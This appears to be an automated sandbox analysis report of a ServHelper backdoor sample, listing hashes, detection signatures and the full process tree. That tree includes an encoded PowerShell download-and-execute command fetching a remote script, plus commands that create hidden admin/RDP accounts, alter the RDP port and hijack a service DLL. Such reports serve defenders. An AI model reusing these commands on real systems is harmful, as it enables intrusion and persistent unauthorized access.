Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
1810s -
max time network
1768s -
platform
windows7_x64 -
resource
win7-en -
submitted
02-09-2021 11:31
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10-en
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 10 1740 powershell.exe 11 1740 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 780 icacls.exe 1000 icacls.exe 1084 icacls.exe 1588 icacls.exe 1212 icacls.exe 1904 takeown.exe 1932 icacls.exe 1960 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1932 1932 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1588 icacls.exe 1212 icacls.exe 1904 takeown.exe 1932 icacls.exe 1960 icacls.exe 780 icacls.exe 1000 icacls.exe 1084 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WVLWSTRPTYRT2K0VAQ3X.temp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 802e293aee9fd701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1468 powershell.exe 1264 powershell.exe 980 powershell.exe 1952 powershell.exe 1468 powershell.exe 1468 powershell.exe 1468 powershell.exe 1740 powershell.exe -
Suspicious behavior: LoadsDriver 59 IoCs
Processes:
pid process 468 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 1932 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1992 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeRestorePrivilege 1960 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1604 WMIC.exe Token: SeIncreaseQuotaPrivilege 1604 WMIC.exe Token: SeAuditPrivilege 1604 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1604 WMIC.exe Token: SeIncreaseQuotaPrivilege 1604 WMIC.exe Token: SeAuditPrivilege 1604 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1568 WMIC.exe Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeAuditPrivilege 1568 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1568 WMIC.exe Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeAuditPrivilege 1568 WMIC.exe Token: SeDebugPrivilege 1740 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1992 wrote to memory of 1468 1992 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 1992 wrote to memory of 1468 1992 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 1992 wrote to memory of 1468 1992 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 1468 wrote to memory of 1460 1468 powershell.exe csc.exe PID 1468 wrote to memory of 1460 1468 powershell.exe csc.exe PID 1468 wrote to memory of 1460 1468 powershell.exe csc.exe PID 1460 wrote to memory of 1568 1460 csc.exe cvtres.exe PID 1460 wrote to memory of 1568 1460 csc.exe cvtres.exe PID 1460 wrote to memory of 1568 1460 csc.exe cvtres.exe PID 1468 wrote to memory of 1264 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1264 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1264 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 980 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 980 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 980 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1952 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1952 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1952 1468 powershell.exe powershell.exe PID 1468 wrote to memory of 1904 1468 powershell.exe takeown.exe PID 1468 wrote to memory of 1904 1468 powershell.exe takeown.exe PID 1468 wrote to memory of 1904 1468 powershell.exe takeown.exe PID 1468 wrote to memory of 1932 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1932 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1932 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1960 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1960 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1960 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 780 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 780 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 780 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1000 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1000 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1000 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1084 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1084 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1084 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1588 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1588 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1588 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1212 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1212 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1212 1468 powershell.exe icacls.exe PID 1468 wrote to memory of 1796 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1796 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1796 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1056 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1056 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1056 1468 powershell.exe reg.exe PID 1468 wrote to memory of 976 1468 powershell.exe reg.exe PID 1468 wrote to memory of 976 1468 powershell.exe reg.exe PID 1468 wrote to memory of 976 1468 powershell.exe reg.exe PID 1468 wrote to memory of 1164 1468 powershell.exe net.exe PID 1468 wrote to memory of 1164 1468 powershell.exe net.exe PID 1468 wrote to memory of 1164 1468 powershell.exe net.exe PID 1164 wrote to memory of 1152 1164 net.exe net1.exe PID 1164 wrote to memory of 1152 1164 net.exe net1.exe PID 1164 wrote to memory of 1152 1164 net.exe net1.exe PID 1468 wrote to memory of 1720 1468 powershell.exe cmd.exe PID 1468 wrote to memory of 1720 1468 powershell.exe cmd.exe PID 1468 wrote to memory of 1720 1468 powershell.exe cmd.exe PID 1720 wrote to memory of 1556 1720 cmd.exe cmd.exe PID 1720 wrote to memory of 1556 1720 cmd.exe cmd.exe PID 1720 wrote to memory of 1556 1720 cmd.exe cmd.exe PID 1556 wrote to memory of 344 1556 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_swl6zs3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5774.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5763.tmp"4⤵PID:1568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1904 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1932 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:780 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1000 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1084 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1588 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1212 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1796
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1056 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:976
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1152
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1692
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1696
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1628
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1904
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1012
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1508
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1000
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1712
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc je5MRPej /add1⤵PID:1384
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc je5MRPej /add2⤵PID:1600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc je5MRPej /add3⤵PID:976
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:708
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1504
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD1⤵PID:616
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD2⤵PID:1364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD3⤵PID:1588
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1944
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1460
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc je5MRPej1⤵PID:976
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc je5MRPej2⤵PID:1392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc je5MRPej3⤵PID:344
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1496
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1012
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1556
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:1728
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:2032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:572
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:1064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:1796
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c8b16c230c1ad3bbb280f134682abd9e
SHA17cde073cacfaa9d2ef5058f43e5d0f7aca0d8a7e
SHA256af6c29782b3d6b7594a04f4a7737cfb23b69fbf61f909d2c4fa8271f1b2ecc3c
SHA512afb0e0d69b1b08439f5663d5fb98d319a4a772e1a8a18a310be431e18470afb4d6647604895ec6cd10df83279078aede3ae4b558abc7113ca2a32e3574b7f159
-
MD5
50961a1830d28def3a7e30ad5762dda8
SHA154e9700451f57e22c2fd46d703d7296957474c41
SHA2567bb722f91cac30e7565c7ee5b8f0d3072d43aa6293c2dc5f0e3cf307c4bc0de4
SHA5121a7ecfec2ece36df77bbb9c25257f613a33bb77d5f0cad7b6a4d899f84789952ff7c8d5c34dcfdf2cd2123fbb10a4fd17f1479f2cf8649d395004acb63b6c4e6
-
MD5
b8172ddd9582696676507901db9667fb
SHA1519e06b64a09f8686d26b531082cdf8d9edf7e1f
SHA2561946833f1b773ecf66c27f55641743fbd4352059e73e9e22333322b463fd1555
SHA512988cc72b36c6198ebb60bb0164e6f1cde086624f90df1df26147bb808df3ca16ae7a4fb81af80e8728d1504758fd5788c977356994cc8313dee8b7b6d229e2d3
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD56ec0d717f615df538cf71bc3aa75e567
SHA1ccac6033efdf2515b8a2ba47280f5cd70ba58cbc
SHA256da37ac60b966aa85729e22ce4980bbeda70a08d744c36b1c1feec61005449532
SHA5125014b53d7b8b7c1d4816e3ef4970e9b4717b0a54c9c3cc42b9a6aef34f30ac30b61b8ff2db96d56771bee8c6349908ece9526604244aae318694c6cc106411d9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD56ec0d717f615df538cf71bc3aa75e567
SHA1ccac6033efdf2515b8a2ba47280f5cd70ba58cbc
SHA256da37ac60b966aa85729e22ce4980bbeda70a08d744c36b1c1feec61005449532
SHA5125014b53d7b8b7c1d4816e3ef4970e9b4717b0a54c9c3cc42b9a6aef34f30ac30b61b8ff2db96d56771bee8c6349908ece9526604244aae318694c6cc106411d9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD56ec0d717f615df538cf71bc3aa75e567
SHA1ccac6033efdf2515b8a2ba47280f5cd70ba58cbc
SHA256da37ac60b966aa85729e22ce4980bbeda70a08d744c36b1c1feec61005449532
SHA5125014b53d7b8b7c1d4816e3ef4970e9b4717b0a54c9c3cc42b9a6aef34f30ac30b61b8ff2db96d56771bee8c6349908ece9526604244aae318694c6cc106411d9
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
e70da655bc6dd19d08882b761d5e2aa0
SHA12041650e90f141ed98959b3b3cd80cf18f153896
SHA2568964179b560f453ee2fba0cb349d1d68c0fa7bbfbaf82575ea39b90bb66591e1
SHA5125114f89cb3189b0c2dbe95e0a1390d760ed99aa2b9f69bca8b3d3d7d9f4bd7013be95c44041d897346d380b2747be094ca45b472c63e826172a03a2879f275bd
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
3f4f11f6b142f70715b38b41d6a95b93
SHA1fd06fdc0d8f5eae8183660862a7880d4ac790183
SHA25652bd4baa90d34800e5818f975a26866b60f9c67630b5424e05af38c9980107cb
SHA5123af14a128a5896150ce93aed20768b65e3ef721dd53eea114194293ef13fcde9b6336496d5bc6514038785afc1ac11641d63f9a8132e00b5bef7ee077b5890ae
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b